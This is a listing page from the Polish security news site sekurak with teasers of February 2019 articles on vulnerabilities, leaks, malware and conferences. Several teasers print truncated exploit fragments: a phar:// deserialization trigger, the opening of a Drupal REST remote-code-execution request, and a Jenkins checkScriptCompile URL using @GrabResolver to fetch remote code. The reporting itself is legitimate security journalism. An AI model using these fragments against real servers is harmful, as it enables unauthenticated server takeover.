Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

W biegu

OSINT – zaawansowane metody pozyskiwania informacji z ogólnodostępnych źródeł. Wpadaj po wiedzę do sekuraka

28 lutego 2019, 14:54 | W biegu | komentarze 3

Artur Czyż to człowiek, który zaskarbił Wasze serca na ostatnim sekurak hacking party – prezentacją na żywo w temacie: wysyłam SMS-a, a kolejnym SMS-em podmieniam tego pierwszego. Jak to zrobić? Artur tłumaczył, że to wszystko jest w dokumentacji i wskazywał dokładnie co to jest to 'wszystko’. Przy okazji zerknijcie na…

Czytaj dalej »

phar:// czyli zło w PHP, które czai się już 10 lat. Pierwsze exploity…

28 lutego 2019, 11:37 | W biegu | komentarzy 6

Temat problemów bezpieczeństwa formatu plików phar, został uznany tutaj za jeden z 10 najbardziej innowacyjnych hacków 2018 roku. W czym problem? Sam dostęp do pliku złośliwego phar, np. w ten sposób: file_get_contents(’phar:///tmp/phartest.jpg/’);  powoduje wykonanie złośliwego kodu po stronie odczytującej. Dlaczego? W pliku phar, można umieścić zawartość zserializowaną, która przy odczycie…

Czytaj dalej »

W Rosji się nie patyczkują – 14 lat więzienia dla jednego z pracowników Kasperskiego

27 lutego 2019, 20:27 | W biegu | komentarze 4

Zazwyczaj nie zajmujemy się tego typu sprawami, ale historia może mieć jeszcze ciekawe reperkusje i finalne zakończenie. Pierwszy skazany to Siergiej Michajłow w randze pułkownika, były zastępca szefa jednostki zajmującej się cyberbezpieczeństwem w FSB – 22 lat więzienia. Rusłan Stojanow – były pracownik Kaspersky Lab – 14 lat więzienia. Rosyjski sąd skazał…

Czytaj dalej »

Wykrywanie / obchodzenie Web Application Firewalli (WAF-ów) – zbiór metod, prezentacji i innych ciekawostek

26 lutego 2019, 20:22 | W biegu | komentarze 3

Czasem pojawia się pytanie – nie będę zabezpieczał swojej aplikacji, ale skonfiguruję WAF-a. Czy mój system jest bezpieczny? To zależy – czasem bezpieczeństwo wzrasta, a czasem drastycznie spada. Ktoś znajdzie jedno ciekawe obejście i bum, słowa pana sprzedawcy-marketingowca są nic nie warte. WAF dał nam mylne poczucie bezpieczeństwa – z…

Czytaj dalej »

Banalny exploit na Drupala – można przejąć serwer bez uwierzytelnienia

23 lutego 2019, 13:41 | W biegu | 1 komentarz

Niewiele trzeba było czekać na analizę ostatniego patcha wydanego przez ekipę Drupala. Jeśli mamy dostępne API RESTowe możemy wykonać taki request: POST /drupal-8.6.9/node/1?_format=hal_json HTTP/1.1 Host: 192.168.56.101 Content-Type: application/hal+json Content-Length: 286 { „_links”: { „type”: { „href”: „http://192.168.56.101/drupal-8.6.9/rest/type/node/article” } }, „type”: { „target_id”: „article” }, „title”: { „value”: „My Article” },…

Czytaj dalej »

Drupal Core – krytyczna podatność w API umożliwiająca przejęcie serwera

21 lutego 2019, 09:38 | W biegu | 0 komentarzy

Właśnie załatano krytyczną podatność w Drupalu. Wiemy na razie niezbyt wiele – na pewno można ją wykorzystać bez uwierzytelnienia oraz ma ona miejsce w module API. Warunkiem możliwości wykorzystania podatności jest prawdopodobnie udostępnienie / włączenie jakiegokolwiek API. Więc na szybko Drupal zaleca wyłączenie metod RESTowych: PUT/PATCH/POST (choć najlepiej podnieść do wersji…

Czytaj dalej »

19 letnia podatność w WinRar – rozpakowujesz archiwum i masz zainfekowany komputer

20 lutego 2019, 19:55 | W biegu | komentarzy 14

Podatność w WinRar (dokładniej mamy ich w sumie aż cztery: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253)  umożliwia wypakowanie pliku z archiwum do dowolnego miejsca na systemie plików. Np. wypakowanie złośliwego pliku exe do katalogu autostartu w Windows (malware odpali się  za każdym razem po restarcie systemu). Jak pisze Checkpoint: Akcja na filmie…

Czytaj dalej »

Nieuwierzytelnione wykonanie kodu w Jenkins (dostęp na system operacyjny)

20 lutego 2019, 10:38 | W biegu | 0 komentarzy

Akcja na filmie tutaj poniżej. Sam exploit jest stosunkowo prosty (do stworzenia od zera nawet na poczekaniu) – choć dojście do niego zdecydowanie nie było banalne. Całość sprowadza się do przygotowania na swojej maszynie stosownego pliku, a następnie odwołanie się do Jenkinsa (bez uwierzytelnienia) zwykłą przeglądarką: http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name=’orange.tw’,…

Czytaj dalej »

Malware WinPot zamienia bankomaty w jednorękich bandytów…

19 lutego 2019, 19:25 | W biegu | 0 komentarzy

Sporo bankomatów nie jest aż tak bezpieczna jak się wydaje. Kaspersky opisuje ciekawą rodzinę malware na bankomaty. Interfejs wygląda nieco podobnie jak w jednorękim bandycie. Po instalacji przestępca wybiera kasetkę (1-4) oraz naciska SPIN (podobnie jak na popularnych automatach do gier). SPIN zaczyna wypłacać pieniądze, STOP zatrzymuje wypłatę, a SCAN sprawdza…

Czytaj dalej »

Prawie 3 miliony poufnych rozmów telefonicznych dostępnych na niezabezpieczonym serwerze (szwedzka linia medyczna 1177)

19 lutego 2019, 14:29 | W biegu | 1 komentarz

Możesz dzwonić 24 na dobę na szwedzki numer 1177 i skonsultować się w temacie problemów zdrowotnych: 1177 – Medical Advice Number – Sjukvårdsrådgivning. The phone number 1177 offers health care advice twenty-four hours a day, year-round, all over Sweden. Informacje te są dość poufne prawda? I chyba nikt nie spodziewał…

Czytaj dalej »

Mega sekurak hacking party – to już kilka dni, ostatnia szansa na zdobycie biletu :)

19 lutego 2019, 13:44 | W biegu | 0 komentarzy

1100 zapisanych osób, prezentacje z hackowaniem na żywo, uznani prelegenci (wielokrotne #1 miejsca w ankietach na podobnych wydarzeniach mówią same za siebie). Wiedza jak chronić ale i jak atakować, możliwości swobodnego networkingu, świetne miejsce (sala koncertowa) z rewelacyjną jakością obrazu na projektorze (tak wiemy, różnie z tymi projektorami bywa na…

Czytaj dalej »

Konferencja Semafor – zapraszamy na naszą prezentację

18 lutego 2019, 13:27 | W biegu | 0 komentarzy

Zapraszamy na tegoroczną konferencję SEMAFOR. Sekurak jest patronem medialnym wydarzenia. Na miejscu Michał Bentkowski od nas pokaże w praktyce czym może grozić podatność XSS. Poniżej informacje od organizatorów: W czasie dwóch dni konferencji zaplanowaliśmy około 50 prelekcji opartych o case studies i 4 ścieżki tematyczne: Audyt IT, Techniczne aspekty bezpieczeństwa, Zarządzanie…

Czytaj dalej »

Chiny: wyciekły dane z systemu rozpoznawania twarzy – baza jednej z firm dostępna bez uwierzytelnienia

17 lutego 2019, 11:16 | W biegu | komentarze 3

Chińczycy biorą przykład z zachodniego świata. Tym razem mamy firmę SenseNets, specjalizującą się w rozmaitych technikach monitoringu obywateli (rozpoznawanie osób z obrazu kamer): …jednak niespecjalizującą się w bezpieczeństwie IT: There is this company in China named SenseNets. They make artificial intelligence-based security software systems for face recognition, crowd analysis, and…

Czytaj dalej »

Łamanie hashy windowsowych (NTLM) z prędkością 100 000 000 000 na sekundę na jednym GPU

15 lutego 2019, 16:06 | W biegu | komentarzy 7

Mały podgląd możliwości Hashcata 6 (wersja beta), na karcie NVIDIA RTX 2080Ti. Łamanie hashy NTLM (wykorzystywanych do tej pory do przechowywania haseł w Windowsach) osiąga tu prędkość 102 gigahashe na sekundę: 102 Gigahashe na sekundę dają złamanie każdego hasła ośmioznakowego w czasie < 24h. Pamiętajcie, hasła co najmniej 8-znakowe (dowolna kombinacja…

Czytaj dalej »